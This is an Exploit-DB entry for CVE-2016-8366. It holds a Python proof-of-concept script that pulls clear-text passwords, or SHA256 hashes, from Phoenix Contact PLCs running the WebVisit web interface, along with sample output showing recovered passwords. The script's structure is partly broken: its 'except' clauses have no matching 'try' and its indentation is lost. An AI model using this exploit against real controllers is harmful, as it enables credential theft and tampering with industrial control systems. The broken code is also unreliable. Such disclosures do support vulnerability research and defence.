EDB-ID: 45586 | Author: Photubias | Published: 2018-10-11 | CVE: CVE-2016-8366 | Type: Webapps | Platform: Hardware | Vulnerable App: N/A | # Exploit Author: Deneut Tijl
# Date: 2018-09-30
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit < 6.40.00
# CVE: CVE-2016-8366
# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI,
# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are
# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved
# Sample output:
# C:\Users\admin\Desktop>CVE-2016-8366.py
# Please enter an IP []:
# This is the password for userlevel 1: pw1
# This is the password for userlevel 2: SuperPass2
# This is the password for userlevel 3: Extreme2TheMax3
# This is the password for userlevel 4: PowerPass4
# Press Enter to exit
# PoC
#! /usr/bin/env python
import urllib2, binascii
strIP = raw_input('Please enter an IP []: ')
if strIP == '': strIP = ''
URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
print('#### Critical Error with IP ' + strIP + ': no response')
raw_input('Press Enter to exit')
strMainTEQ = ''
for line in URLResponse.readlines():
if 'MainTEQName' in line:
strMainTEQ = line.split('VALUE="')[1].split('"')[0]
if strMainTEQ == '':
print('#### Error, no \'MainTEQ\' found on the main page')
raw_input('Press Enter to exit')
LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))
except urllib2.HTTPError:
print('Critical Error with IP ' + strIP + ': File \'' + strMainTEQ + '\' not found')
raw_input('Press Enter to exit')
strAlldata = ''
for line in LoginTeqResponse.readlines():
strAlldata += binascii.hexlify(line)
## For vulnerable webvisit:
## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'
## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'
## For WebVisit > 6.40.00
## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)
arrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'
for item in arrData:
if '00030003010301068300' in item:
intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1
strPassLength = item.split('00030003010301068300')[1][:2]
strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])
print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)
elif '0003000301030b06830040' in item:
intUserlevel = int(binascii.unhexlify(item[:2]), 16)
strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])
print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())
raw_input('Press Enter to exit')